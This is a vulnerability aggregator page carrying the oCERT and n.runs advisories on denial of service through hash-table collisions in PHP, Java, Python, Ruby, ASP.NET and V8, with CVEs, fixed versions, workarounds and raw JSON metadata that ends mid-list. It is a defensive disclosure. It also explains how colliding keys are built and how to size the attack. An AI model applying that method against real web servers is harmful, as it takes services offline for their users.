Search...

[oCERT-2011-003] multiple implementations denial-of-service via hash algorithm collision

2012-01-02T00:00:00

ID SECURITYVULNS:DOC:27500
Type securityvulns
Reporter Securityvulns
Modified 2012-01-02T00:00:00

Description

2011-003 multiple implementations denial-of-service via hash algorithm

collision

Description:

A variety of programming languages suffer from a denial-of-service (DoS) condition against storage functions of key/value pairs in hash data structures, the condition can be leveraged by exploiting predictable collisions in the underlying hashing algorithms.

The issue finds particular exposure in web server applications and/or frameworks. In particular, the lack of sufficient limits for the number of parameters in POST requests in conjunction with the predictable collision properties in the hashing functions of the underlying languages can render web applications vulnerable to the DoS condition. The attacker, using specially crafted HTTP requests, can lead to a 100% of CPU usage which can last up to several hours depending on the targeted application and server performance, the amplification effect is considerable and requires little bandwidth and time on the attacker side.

The condition for predictable collisions in the hashing functions has been reported for the following language implementations: Java, JRuby, PHP, Python, Rubinius, Ruby. In the case of the Ruby language, the 1.9.x branch is not affected by the predictable collision condition since this version includes a randomization of the hashing function.

The vulnerability outlined in this advisory is practically identical to the one reported in 2003 and described in the paper Denial of Service via Algorithmic Complexity Attacks which affected the Perl language.

The reporters own advisory can be found at http://www.nruns.com/_downloads/advisory28122011.pdf

Affected version: Java, all versions JRuby <= 1.6.5 PHP <= 5.3.8, <= 5.4.0RC3 Python, all versions Rubinius, all versions Ruby <= 1.8.7-p356

Apache Geronimo, all versions Apache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22 Oracle Glassfish <= 3.1.1 Jetty, all versions Plone, all versions Rack, all versions V8 JavaScript Engine, all versions

Fixed version: Java, N/A JRuby >= 1.6.5.1 PHP >= 5.3.9, >= 5.4.0RC4 Python, N/A Rubinius, N/A Ruby >= 1.8.7-p357, 1.9.x

Apache Geronimo, N/A Apache Tomcat >= 5.5.35, >= 6.0.35, >= 7.0.23 Oracle Glassfish, N/A (Oracle reports that the issue is fixed in the main codeline and scheduled for a future CPU) Jetty, N/A Plone, N/A Rack, N/A V8 JavaScript Engine, N/A

Credit: vulnerability report and PoC code received from Alexander Klink <alexander.klink AT nruns.com> and Julian Waelde <jwaelde AT cdc.informatik.tu-darmstadt.de>.

CVE: CVE-2011-4461 (Jetty), CVE-2011-4838 (JRuby), CVE-2011-4885 (PHP), CVE-2011-4462 (Plone), CVE-2011-4815 (Ruby)

Timeline:

2011-09-25: vulnerability report received, reporters set embargo date to December 27th 2011-10-18: contacted maintainers of Apache Tomcat, Apache Geronimo, Jetty, Java, Plone, Zope, V8 2011-11-01: contacted maintainers of Ruby on Rails, Ruby, Python, PHP 2011-11-01: contacted affected distributions 2011-11-02: contacted JRuby maintainer 2011-12-13: contacted Ruby Installer maintainer 2011-12-14: assigned CVE for Ruby 2011-12-15: assigned CVE for JRuby 2011-12-13: contacted Rack maintainer 2011-12-16: assigned CVE for Apache Tomcat 2011-12-21: assigned CVE for PHP 2011-12-28: advisory release

References: http://www.nruns.com/_downloads/advisory28122011.pdf http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf http://svn.php.net/viewvc?view=revision&revision=321003 (unstable, not final) http://svn.php.net/viewvc?view=revision&revision=321040 (unstable, not final) https://gist.github.com/52bbc6b9cc19ce330829

Permalink: http://www.ocert.org/advisories/ocert-2011-003.html

-- Andrea Barisani | Founder & Project Coordinator oCERT | OSS Computer Security Incident Response Team

<lcars@ocert.org> http://www.ocert.org 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E "Pluralitas non est ponenda sine necessitate"

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:27500", "bulletinFamily": "software", "title": "[oCERT-2011-003] multiple implementations denial-of-service via hash algorithm collision", "description": "\r\n#2011-003 multiple implementations denial-of-service via hash algorithm\r\ncollision\r\n\r\nDescription:\r\n\r\nA variety of programming languages suffer from a denial-of-service (DoS)\r\ncondition against storage functions of key/value pairs in hash data\r\nstructures, the condition can be leveraged by exploiting predictable\r\ncollisions in the underlying hashing algorithms.\r\n\r\nThe issue finds particular exposure in web server applications and/or\r\nframeworks. In particular, the lack of sufficient limits for the number of\r\nparameters in POST requests in conjunction with the predictable collision\r\nproperties in the hashing functions of the underlying languages can render web\r\napplications vulnerable to the DoS condition. The attacker, using specially\r\ncrafted HTTP requests, can lead to a 100% of CPU usage which can last up to\r\nseveral hours depending on the targeted application and server performance,\r\nthe amplification effect is considerable and requires little bandwidth and\r\ntime on the attacker side.\r\n\r\nThe condition for predictable collisions in the hashing functions has been\r\nreported for the following language implementations: Java, JRuby, PHP, Python,\r\nRubinius, Ruby. In the case of the Ruby language, the 1.9.x branch is not\r\naffected by the predictable collision condition since this version includes a\r\nrandomization of the hashing function.\r\n\r\nThe vulnerability outlined in this advisory is practically identical to the\r\none reported in 2003 and described in the paper Denial of Service via\r\nAlgorithmic Complexity Attacks which affected the Perl language.\r\n\r\nThe reporters own advisory can be found at\r\nhttp://www.nruns.com/_downloads/advisory28122011.pdf\r\n\r\nAffected version:\r\nJava, all versions\r\nJRuby <= 1.6.5\r\nPHP <= 5.3.8, <= 5.4.0RC3\r\nPython, all versions\r\nRubinius, all versions\r\nRuby <= 1.8.7-p356\r\n\r\nApache Geronimo, all versions\r\nApache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22\r\nOracle Glassfish <= 3.1.1\r\nJetty, all versions\r\nPlone, all versions\r\nRack, all versions\r\nV8 JavaScript Engine, all versions\r\n\r\nFixed version:\r\nJava, N/A\r\nJRuby >= 1.6.5.1\r\nPHP >= 5.3.9, >= 5.4.0RC4\r\nPython, N/A\r\nRubinius, N/A\r\nRuby >= 1.8.7-p357, 1.9.x\r\n\r\nApache Geronimo, N/A\r\nApache Tomcat >= 5.5.35, >= 6.0.35, >= 7.0.23\r\nOracle Glassfish, N/A (Oracle reports that the issue is fixed in the main codeline and scheduled for a future CPU)\r\nJetty, N/A\r\nPlone, N/A\r\nRack, N/A\r\nV8 JavaScript Engine, N/A\r\n\r\nCredit: vulnerability report and PoC code received from Alexander Klink\r\n<alexander.klink AT nruns.com> and Julian Waelde <jwaelde AT\r\ncdc.informatik.tu-darmstadt.de>.\r\n\r\nCVE: CVE-2011-4461 (Jetty), CVE-2011-4838 (JRuby), CVE-2011-4885 (PHP),\r\n CVE-2011-4462 (Plone), CVE-2011-4815 (Ruby)\r\n\r\nTimeline:\r\n\r\n2011-09-25: vulnerability report received, reporters set embargo date to December 27th\r\n2011-10-18: contacted maintainers of Apache Tomcat, Apache Geronimo, Jetty, Java, Plone, Zope, V8\r\n2011-11-01: contacted maintainers of Ruby on Rails, Ruby, Python, PHP\r\n2011-11-01: contacted affected distributions\r\n2011-11-02: contacted JRuby maintainer\r\n2011-12-13: contacted Ruby Installer maintainer\r\n2011-12-14: assigned CVE for Ruby\r\n2011-12-15: assigned CVE for JRuby\r\n2011-12-13: contacted Rack maintainer\r\n2011-12-16: assigned CVE for Apache Tomcat\r\n2011-12-21: assigned CVE for PHP\r\n2011-12-28: advisory release\r\n\r\nReferences:\r\nhttp://www.nruns.com/_downloads/advisory28122011.pdf\r\nhttp://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf\r\nhttp://svn.php.net/viewvc?view=revision&revision=321003 (unstable, not final)\r\nhttp://svn.php.net/viewvc?view=revision&revision=321040 (unstable, not final)\r\nhttps://gist.github.com/52bbc6b9cc19ce330829\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2011-003.html\r\n\r\n-- \r\nAndrea Barisani | Founder & Project Coordinator\r\n oCERT | OSS Computer Security Incident Response Team\r\n\r\n<lcars@ocert.org> http://www.ocert.org\r\n 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E\r\n "Pluralitas non est ponenda sine necessitate"\r\n", "published": "2012-01-02T00:00:00", "modified": "2012-01-02T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27500", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2011-4461", "CVE-2011-4462", "CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:43", "edition": 1, "viewCount": 24, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-08-31T11:10:43", "rev": 2}, "dependencies": {"references": [{"type": "seebug", "idList": ["SSV:26121", "SSV:30001", "SSV:72454", "SSV:26126"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4462", "UB:CVE-2011-4461", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4461", "CVE-2011-4815", "CVE-2011-4462"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310840993", "OPENVAS:831554", "OPENVAS:863921", "OPENVAS:881167", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:70754", "OPENVAS:864104", "OPENVAS:840993", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310864104", "OPENVAS:71568", "OPENVAS:136141256231070754", "OPENVAS:1361412562310864103", "OPENVAS:864103"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "UBUNTU_USN-1429-1.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2012-0730.NASL", "CENTOS_RHSA-2012-0069.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2012-0504.NASL", "F5_BIGIP_SOL13588.NASL", "GENTOO_GLSA-201207-06.NASL", "FEDORA_2012-0752.NASL", "REDHAT-RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "SUSE_11_4_JETTY5-120215.NASL", "CENTOS_RHSA-2012-0070.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2011-17542.NASL", "FEDORA_2011-17551.NASL", "OPENSUSE-2012-128.NASL", "FEDORA_2012-0420.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "github", "idList": ["GHSA-PCWM-8JC3-QXVJ"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501"]}, {"type": "centos", "idList": ["CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6555420CE1", "FEDORA:8FB3320923", "FEDORA:6D8EE20EB6"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:1605", "RHSA-2012:1606", "RHSA-2012:0069", "RHSA-2012:0070"]}, {"type": "ubuntu", "idList": ["USN-1429-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:6EC99", "DEBIAN:DLA-209-1:3C908"]}, {"type": "rubygems", "idList": ["RUBY:JRUBY-2011-4838-78116"]}], "modified": "2018-08-31T11:10:43", "rev": 2}, "vulnersScore": 6.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}}

{"seebug": [{"sourceData": "\n US-CERT is aware of reports stating that multiple programming language implementations, including web platforms, are vulnerable to hash table collision attacks. This vulnerability could be used by an attacker to launch a denial-of-service attack against websites using affected products. \r\n\r\nThe Ruby Security Team has updated Ruby 1.8.7. The Ruby 1.9 series is not affected by this attack. Additional information can be found in the ruby 1.8.7 patchlevel 357 release notes.\r\n\r\nMicrosoft has released a security advisory for ASP.NET containing a workaround. Additional information can be found in Microsoft Security Advisory 2659883.\r\n\r\nMore information regarding this vulnerability can be found in US-CERT Vulnerability Note VU#903934 and n.runs Security Advisory n.runs-SA-2011.004.\r\n\r\n---\r\nsebug\r\n\r\n\u76ee\u524d\u5df2\u77e5\u7684\u53d7\u5f71\u54cd\u7684\u8bed\u8a00\u4ee5\u53ca\u7248\u672c\u6709::\r\nJava, \u6240\u6709\u7248\u672c\r\nJRuby <= 1.6.5\r\nPHP <= 5.3.8, <= 5.4.0RC3\r\nPython, \u6240\u6709\u7248\u672c\r\nRubinius, \u6240\u6709\u7248\u672c\r\nRuby <= 1.8.7-p356\r\nApache Geronimo, \u6240\u6709\u7248\u672c\r\nApache Tomcat <= 5.5.34, <= 6.0.34, <= 7.0.22\r\nOracle Glassfish <= 3.1.1\r\nJetty, \u6240\u6709\u7248\u672c\r\nPlone, \u6240\u6709\u7248\u672c\r\nRack, \u6240\u6709\u7248\u672c\r\nV8 JavaScript Engine, \u6240\u6709\u7248\u672c\r\n\r\n\u4e0d\u53d7\u6b64\u5f71\u54cd\u7684\u8bed\u8a00\u6216\u8005\u4fee\u590d\u7248\u672c\u7684\u8bed\u8a00\u6709::\r\nPHP >= 5.3.9, >= 5.4.0RC4\r\nJRuby >= 1.6.5.1\r\nRuby >= 1.8.7-p357, 1.9.x\r\nApache Tomcat >= 5.5.35, >= 6.0.35, >= 7.0.23\r\nOracle Glassfish, N/A (Oracle reports that the issue is fixed in the main codeline and scheduled for a future CPU)\r\n\r\nCVE: CVE-2011-4885 (PHP), CVE-2011-4461 (Jetty), CVE-2011-4838 (JRuby), CVE-2011-4462 (Plone), CVE-2011-4815 (Ruby)\r\n\r\n---\r\n\r\n===================================\r\n\r\nn.runs AG\r\nhttp://www.nruns.com/ security(at)nruns.com\r\nn.runs-SA-2011.004 28-Dec-2011\r\n________________________________________________________________________\r\nVendors: PHP, http://www.php.net\r\n Oracle, http://www.oracle.com\r\n Microsoft, http://www.microsoft.com\r\n Python, http://www.python.org\r\n Ruby, http://www.ruby.org\r\n Google, http://www.google.com\r\nAffected Products: PHP 4 and 5\r\n Java\r\n Apache Tomcat\r\n Apache Geronimo\r\n Jetty\r\n Oracle Glassfish\r\n ASP.NET\r\n Python\r\n Plone\r\n CRuby 1.8, JRuby, Rubinius \r\n v8\r\nVulnerability: Denial of Service through hash table\r\n multi-collisions\r\nTracking IDs: oCERT-2011-003\r\n CERT VU#903934\r\n________________________________________________________________________\r\nVendor communication:\r\n2011/11/01 Coordinated notification to PHP, Oracle, Python, Ruby, Google\r\n via oCERT\r\n2011/11/29 Coordinated notification to Microsoft via CERT\r\n\r\nVarious communication with the vendors for clarifications, distribution\r\nof PoC code, discussion of fixes, etc.\r\n___________________________________________________________________________\r\nOverview:\r\n\r\nHash tables are a commonly used data structure in most programming\r\nlanguages. Web application servers or platforms commonly parse\r\nattacker-controlled POST form data into hash tables automatically, so\r\nthat they can be accessed by application developers.\r\n\r\nIf the language does not provide a randomized hash function or the\r\napplication server does not recognize attacks using multi-collisions, an\r\nattacker can degenerate the hash table by sending lots of colliding\r\nkeys. The algorithmic complexity of inserting n elements into the table\r\nthen goes to O(n**2), making it possible to exhaust hours of CPU time\r\nusing a single HTTP request.\r\n\r\nThis issue has been known since at least 2003 and has influenced Perl\r\nand CRuby 1.9 to change their hash functions to include randomization.\r\n\r\nWe show that PHP 5, Java, ASP.NET as well as v8 are fully vulnerable to\r\nthis issue and PHP 4, Python and Ruby are partially vulnerable,\r\ndepending on version or whether the server running the code is a 32 bit\r\nor 64 bit machine.\r\n\r\nDescription:\r\n\r\n= Theory =\r\n\r\nMost hash functions used in hash table implementations can be broken\r\nfaster than by using brute-force techniques (which is feasible for hash\r\nfunctions with 32 bit output, but very expensive for 64 bit functions)\r\nby using one of two \u201ctricks\u201d: equivalent substrings or a\r\nmeet-in-the-middle attack.\r\n\r\n== Equivalent substrings ==\r\n\r\nSome hash functions have the property that if two strings collide, e.g.\r\nhash('string1') = hash('string2'), then hashes having this substring at\r\nthe same position collide as well, e.g. hash('prefixstring1postfix') =\r\nhash('prefixstring2postfix'). If for example 'Ez' and 'FY' collide under\r\na hash function with this property, then 'EzEz', 'EzFY', 'FYEz', 'FYFY'\r\ncollide as well. An observing reader may notice that this is very\r\nsimilar to binary counting from zero to four. Using this knowledge, an\r\nattacker can construct arbitrary numbers of collisions (2^n for\r\n2*n-sized strings in this example).\r\n\r\n== Meet-in-the-middle attack ==\r\n\r\nIf equivalent substrings are not present in a given hash function, then\r\nbrute-force seems to be the only solution. The obvious way to best use\r\nbrute-force would be to choose a target value and hash random\r\n(fixed-size) strings and store those which hash to the target value. For\r\na non-biased hash function with 32 bit output length, the probability of\r\nhitting a target in this way is 1/(2^32).\r\n\r\nA meet-in-the-middle attack now tries to hit more than one target at a\r\ntime. If the hash function can be inverted and the internal state of the\r\nhash function has the same size as the output, one can split the string\r\ninto two parts, a prefix (of size n) and a postfix (of size m). One can\r\nnow iterate over all possible m-sized postfix strings and calculate the\r\nintermediate value under which the hash function maps to a certain\r\ntarget. If one stores these strings and corresponding intermediate value\r\nin a lookup table, one can now generate random n-sized prefix strings\r\nand see if they map to one of the intermediate values in the lookup\r\ntable. If this is the case, the complete string will map to the target\r\nvalue.\r\n\r\nSplitting in the middle reduces the complexity of this attack by the\r\nsquare root, which gives us the probability of 1/(2^16) for a collision,\r\nthus enabling an attacker to generate multi-collisions much faster.\r\n\r\nThe hash functions we looked at which were vulnerable to an equivalent\r\nsubstring attack were all vulnerable to a meet-in-the-middle attack as\r\nwell. In this case, the meet-in-the-middle attack provides more\r\ncollisions for strings of a fixed size than the equivalent substring\r\nattack.\r\n\r\n= The real world =\r\n\r\nThe different language use different hash functions which suffer from\r\ndifferent problems. They also differ in how they use hash tables in\r\nstoring POST form data.\r\n\r\n== PHP 5 ==\r\n\r\nPHP 5 uses the DJBX33A (Dan Bernstein's times 33, addition) hash\r\nfunction and parses POST form data into the $_POST hash table. Because\r\nof the structure of the hash function, it is vulnerable to an equivalent\r\nsubstring attack.\r\n\r\nThe maximal POST request size is typically limited to 8 MB, which when\r\nfilled with a set of multi-collisions would consume about four hours of\r\nCPU time on an i7 core. Luckily, this time can not be exhausted because\r\nit is limited by the max_input_time (default configuration: -1,\r\nunlimited), Ubuntu and several BSDs: 60 seconds) configuration\r\nparameter. If the max_input_time parameter is set to -1 (theoretically:\r\nunlimited), it is bound by the max_execution_time configuration\r\nparameter (default value: 30).\r\n\r\nOn an i7 core, the 60 seconds take a string of multi-collisions of about\r\n500k. 30 seconds of CPU time can be generated using a string of about\r\n300k. This means that an attacker needs about 70-100kbit/s to keep one\r\ni7 core constantly busy. An attacker with a Gigabit connection can keep\r\nabout 10.000 i7 cores busy.\r\n\r\n== ASP.NET ==\r\n\r\nASP.NET uses the Request.Form object to provide POST data to a web\r\napplication developer. This object is of class NameValueCollection. This\r\nuses a different hash function than the standard .NET one, namely\r\nCaseInsensitiveHashProvider.getHashCode(). This is the DJBX33X (Dan\r\nBernstein's times 33, XOR) hash function on the uppercase version of the\r\nkey, which is breakable using a meet-in-the-middle attack.\r\n\r\nCPU time is limited by the IIS webserver to a value of typically 90\r\nseconds. This allows an attacker with about 30kbit/s to keep one Core2\r\ncore constantly busy. An attacker with a Gigabit connection can keep\r\nabout 30.000 Core2 cores busy.\r\n\r\n== Java ==\r\n\r\nJava offers the HashMap and Hashtable classes, which use the\r\nString.hashCode() hash function. It is very similar to DJBX33A (instead\r\nof 33, it uses the multiplication constant 31 and instead of the start\r\nvalue 5381 it uses 0). Thus it is also vulnerable to an equivalent\r\nsubstring attack. When hashing a string, Java also caches the hash value\r\nin the hash attribute, but only if the result is different from zero.\r\nThus, the target value zero is particularly interesting for an attacker\r\nas it prevents caching and forces re-hashing.\r\n\r\nDifferent web application parse the POST data differently, but the ones\r\ntested (Tomcat, Geronima, Jetty, Glassfish) all put the POST form data\r\ninto either a Hashtable or HashMap object. The maximal POST sizes also\r\ndiffer from server to server, with 2 MB being the most common.\r\n\r\nA Tomcat 6.0.32 server parses a 2 MB string of colliding keys in about\r\n44 minutes of i7 CPU time, so an attacker with about 6 kbit/s can keep\r\none i7 core constantly busy. If the attacker has a Gigabit connection,\r\nhe can keep about 100.000 i7 cores busy.\r\n\r\n== Python ==\r\n\r\nPython uses a hash function which is very similar to DJBX33X, which can\r\nbe broken using a meet-in-the-middle attack. It operates on register\r\nsize and is thus different for 64 and 32 bit machines. While generating\r\nmulti-collisions efficiently is also possible for the 64 bit version of\r\nthe function, the resulting colliding strings are too large to be\r\nrelevant for anything more than an academic attack.\r\n\r\nPlone as the most prominent Python web framework accepts 1 MB of POST\r\ndata, which it parses in about 7 minutes of CPU time in the worst case.\r\nThis gives an attacker with about 20 kbit/s the possibility to keep one\r\nCore Duo core constantly busy. If the attacker is in the position to\r\nhave a Gigabit line available, he can keep about 50.000 Core Duo cores\r\nbusy.\r\n\r\n== Ruby ==\r\n\r\nThe Ruby language consists of several implementations which do not share\r\nthe same hash functions. It also differs in versions (1.8, 1.9), which \u2212\r\ndepending on the implementation \u2212 also do not necessarily share the same\r\nhash function.\r\n\r\nThe hash function of CRuby 1.9 has been using randomization since 2008\r\n(a result of the algorithmic complexity attacks disclosed in 2003). The\r\nCRuby 1.8 function is very similar to DJBX33A, but the large\r\nmultiplication constant of 65599 prevents an effective equivalent\r\nsubstring attack. The hash function can be easily broken using a meet-\r\nin-the-middle attack, though. JRuby uses the CRuby 1.8 hash function for\r\nboth 1.8 and 1.9. Rubinius uses a different hash function but also does\r\nnot randomize it.\r\n\r\nA typical POST size limit in Ruby frameworks is 2 MB, which takes about\r\n6 hours of i7 CPU time to parse. Thus, an attacker with a single 850\r\nbits/s line can keep one i7 core busy. The other way around, an attacker\r\nwith a Gigabit connection can keep about 1.000.000 (one million!) i7\r\ncores busy.\r\n\r\n== v8 ==\r\n\r\nGoogle's Javascript implementation v8 uses a hash function which looks\r\ndifferent from the ones seen before, but can be broken using a meet-in-\r\nthe-middle attack, too.\r\n\r\nNode.js uses v8 to run Javascript-based web applications. The\r\nquerystring module parses POST data into a hash table structure.\r\n\r\nAs node.js does not limit the POST size by default (we assume this would\r\ntypically be the job of a framework), no effectiveness/efficiency\r\nmeasurements were performed.\r\n\r\nImpact:\r\n\r\nAny website running one of the above technologies which provides the\r\noption to perform a POST request is vulnerable to very effective DoS\r\nattacks.\r\n\r\nAs the attack is just a POST request, it could also be triggered from\r\nwithin a (third-party) website. This means that a cross-site-scripting\r\nvulnerability on a popular website could lead to a very effective DDoS\r\nattack (not necessarily against the same website).\r\n\r\nFixes:\r\n\r\nThe Ruby Security Team was very helpful in addressing this issue and\r\nboth CRuby and JRuby provide updates for this issue with a randomized\r\nhash function (CRuby 1.8.7-p357, JRuby 1.6.5.1, CVE-2011-4815).\r\n\r\nOracle has decided there is nothing that needs to be fixed within Java\r\nitself, but will release an updated version of Glassfish in a future CPU\r\n(Oracle Security ticket S0104869).\r\n\r\nTomcat has released updates (7.0.23, 6.0.35) for this issue which limit\r\nthe number of request parameters using a configuration parameter. The\r\ndefault value of 10.000 should provide sufficient protection.\r\n\r\nWorkarounds:\r\n\r\nFor languages were no fixes have been issued (yet?), there are a number\r\nof workarounds.\r\n\r\n= Limiting CPU time =\r\n\r\nThe easiest way to reduce the impact of such an attack is to reduce the\r\nCPU time that a request is allowed to take. For PHP, this can be\r\nconfigured using the max_input_time parameter. On IIS (for ASP.NET),\r\nthis can be configured using the \u201cshutdown time limit for processes\u201d\r\nparameter.\r\n\r\n= Limiting maximal POST size =\r\n\r\nIf you can live with the fact that users can not put megabytes of data\r\ninto your forms, limiting the form size to a small value (in the 10s of\r\nkilobytes rather than the usual megabytes) can drastically reduce the\r\nimpact of the attack as well.\r\n\r\n= Limiting maximal number of parameters =\r\n\r\nThe updated Tomcat versions offer an option to reduce the amount of\r\nparameters accepted independent from the maximal POST size. Configuring\r\nthis is also possible using the Suhosin version of PHP using the\r\nsuhosin.{post|request}.max_vars parameters.\r\n\r\n________________________________________________________________________\r\nCredits:\r\nAlexander Klink, n.runs AG\r\nJulian W\u00e4lde, Technische Universit\u00e4t Darmstadt\r\n\r\nThe original theory behind this attack vector is described in the 2003\r\nUsenix Security paper \u201cDenial of Service via Algorithmic Complexity\r\nAttacks\u201d by Scott A. Crosby and Dan S. Wallach, Rice University\r\n________________________________________________________________________\r\nReferences:\r\nThis advisory and upcoming advisories:\r\nhttp://www.nruns.com/security_advisory.php\r\n________________________________________________________________________\r\nAbout n.runs:\r\nn.runs AG is a vendor-independent consulting company specialising in the\r\nareas of: IT Infrastructure, IT Security and IT Business Consulting.\r\n\r\nCopyright Notice:\r\nUnaltered electronic reproduction of this advisory is permitted. For all\r\nother reproduction or publication, in printing or otherwise, contact\r\nsecurity@nruns.com for permission. Use of the advisory constitutes\r\nacceptance for use in an \u201cas is\u201d condition. All warranties are excluded.\r\nIn no event shall n.runs be liable for any damages whatsoever including\r\ndirect, indirect, incidental, consequential, loss of business profits or\r\nspecial damages, even if n.runs has been advised of the possibility of\r\nsuch damages.\r\nCopyright 2011 n.runs AG. All rights reserved. Terms of use apply.\n ", "status": "poc", "history": [], "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-26121", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-26121", "type": "seebug", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "viewCount": 120, "references": [], "lastseen": "2017-11-19T17:56:14", "published": "2011-12-29T00:00:00", "objectVersion": "1.5", "cvelist": ["CVE-2011-4461", "CVE-2011-4462", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "id": "SSV:26121", "enchantments_done": [], "modified": "2011-12-29T00:00:00", "title": "Multiple Programming Language Implementations Vulnerable to Hash Table Collision Attacks", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2017-11-19T17:56:14", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "checkpoint_security", "idList": ["CPS:SK66350"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2011-4838"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4838", "UB:CVE-2011-4885", "UB:CVE-2011-4462", "UB:CVE-2011-4461", "UB:CVE-2011-4815"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4461", "CVE-2011-4815", "CVE-2011-4462"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/"]}, {"type": "cert", "idList": ["VU:903934"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122002", "OPENVAS:1361412562310831554", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310840993", "OPENVAS:831554", "OPENVAS:863921", "OPENVAS:881167", "OPENVAS:863681", "OPENVAS:870638", "OPENVAS:70754", "OPENVAS:864104", "OPENVAS:840993", "OPENVAS:1361412562310881167", "OPENVAS:136141256231071568", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310864104", "OPENVAS:71568", "OPENVAS:136141256231070754", "OPENVAS:1361412562310864103", "OPENVAS:864103"]}, {"type": "nessus", "idList": ["DEBIAN_DLA-209.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ALA_ALAS-2012-35.NASL", "SOLARIS11_RUBY_20120417.NASL", "UBUNTU_USN-1429-1.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2012-0730.NASL", "CENTOS_RHSA-2012-0069.NASL", 